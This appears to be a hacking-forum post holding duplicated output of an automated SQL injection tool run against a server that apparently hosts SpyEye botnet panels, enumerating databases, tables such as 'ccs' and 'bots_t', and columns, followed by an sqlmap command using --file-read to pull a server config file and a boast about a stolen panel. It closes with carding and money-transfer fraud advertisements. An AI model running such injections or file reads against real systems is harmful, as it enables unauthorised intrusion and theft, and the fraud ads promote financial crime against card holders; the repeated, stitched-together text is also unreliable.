Analyzing
Host IP: xx.xx.xx.xx
Web Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch
Powered-by: PHP/5.2.6-1+lenny10
Can not find keyword but let me do a try!
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
Can't find db server type! But maybe there be some chances! [-o<
Selected Column Count is 7
Tying to find string column for MySQL
Valid String Column is 2
DB Server: MySQL
Target Vulnerable
Current DB: fra
Data Base Found: information_schema
Data Base Found: bc
Data Base Found: fra
Data Base Found: gar
Data Base Found: mysql
Count(table_name) of information_schema.tables Where table_schema=0x667261 is 27
Tables found: ccs,cert,exceptions_,exceptions_20110407,exception s_20110408,exceptions_20110409,exceptions_20110410 ,exceptions_20110411,exceptions_20110412,exception s_20110413,exceptions_20110414,exceptions_20110415 ,exceptions_20110416,hostban,rep1,rep2_,rep2_20110 407,rep2_20110408,rep2_20110409,rep2_20110410,rep2 _20110411,rep2_20110412,rep2_20110413,rep2_2011041 4,rep2_20110415,rep2_20110416,scr_
Count(table_name) of information_schema.tables Where table_schema=0x676172 is 17
Tables found: bots_t,city_t,configs_t,country_t,files_t,geo_city ,geo_country,geo_loc,ip_t,loads_rep_t,loads_t,logs _t,os_t,plugins,screens_t,tasks_t,users_t
Count(column_name) of information_schema.columns Where table_schema=0x676172 AND table_name=0x626F74735F74 is 15
Columns found: id_bot,guid_bot,ver_bot,status_bot,blocked,fk_city _bot,date_last_run_bot,date_last_online_bot,os_ver sion_bot,ie_version_bot,user_type_bot,date_install _bot,date_last_geoip_check_bot,fk_screen_bot,wake_ time_bot
# ./sqlmap.py -u" " --file-read=/var/www/formgrab/config.php
let's check cat output/xx.xx.xx.xx/files/_var_www_s3_fr3
Here is also new spyeye panel, stolen from another guy.
Host IP: xx.xx.xx.xx
Web Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch
Powered-by: PHP/5.2.6-1+lenny10
Can not find keyword but let me do a try!
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
Can't find db server type! But maybe there be some chances! [-o<
Selected Column Count is 7
Tying to find string column for MySQL
Valid String Column is 2
DB Server: MySQL
Target Vulnerable
Current DB: fra
Data Base Found: information_schema
Data Base Found: bc
Data Base Found: fra
Data Base Found: gar
Data Base Found: mysql
Count(table_name) of information_schema.tables Where table_schema=0x667261 is 27
Tables found: ccs,cert,exceptions_,exceptions_20110407,exception s_20110408,exceptions_20110409,exceptions_20110410 ,exceptions_20110411,exceptions_20110412,exception s_20110413,exceptions_20110414,exceptions_20110415 ,exceptions_20110416,hostban,rep1,rep2_,rep2_20110 407,rep2_20110408,rep2_20110409,rep2_20110410,rep2 _20110411,rep2_20110412,rep2_20110413,rep2_2011041 4,rep2_20110415,rep2_20110416,scr_
Count(table_name) of information_schema.tables Where table_schema=0x676172 is 17
Tables found: bots_t,city_t,configs_t,country_t,files_t,geo_city ,geo_country,geo_loc,ip_t,loads_rep_t,loads_t,logs _t,os_t,plugins,screens_t,tasks_t,users_t
Count(column_name) of information_schema.columns Where table_schema=0x676172 AND table_name=0x626F74735F74 is 15
Columns found: id_bot,guid_bot,ver_bot,status_bot,blocked,fk_city _bot,date_last_run_bot,date_last_online_bot,os_ver sion_bot,ie_version_bot,user_type_bot,date_install _bot,date_last_geoip_check_bot,fk_screen_bot,wake_ time_bot
# ./sqlmap.py -u" " --file-read=/var/www/formgrab/config.php
let's check cat output/xx.xx.xx.xx/files/_var_www_s3_fr3
Here is also new spyeye panel, stolen from another guy.
Verified & Trusted WesternUnion | MoneyGram | Bank - Transferring [299$ BTC for 2000$ WU]
Verified & Trusted Electronics Carding, Carding iPhone, Samsung Carding, MacBook Carding, Laptops Carding
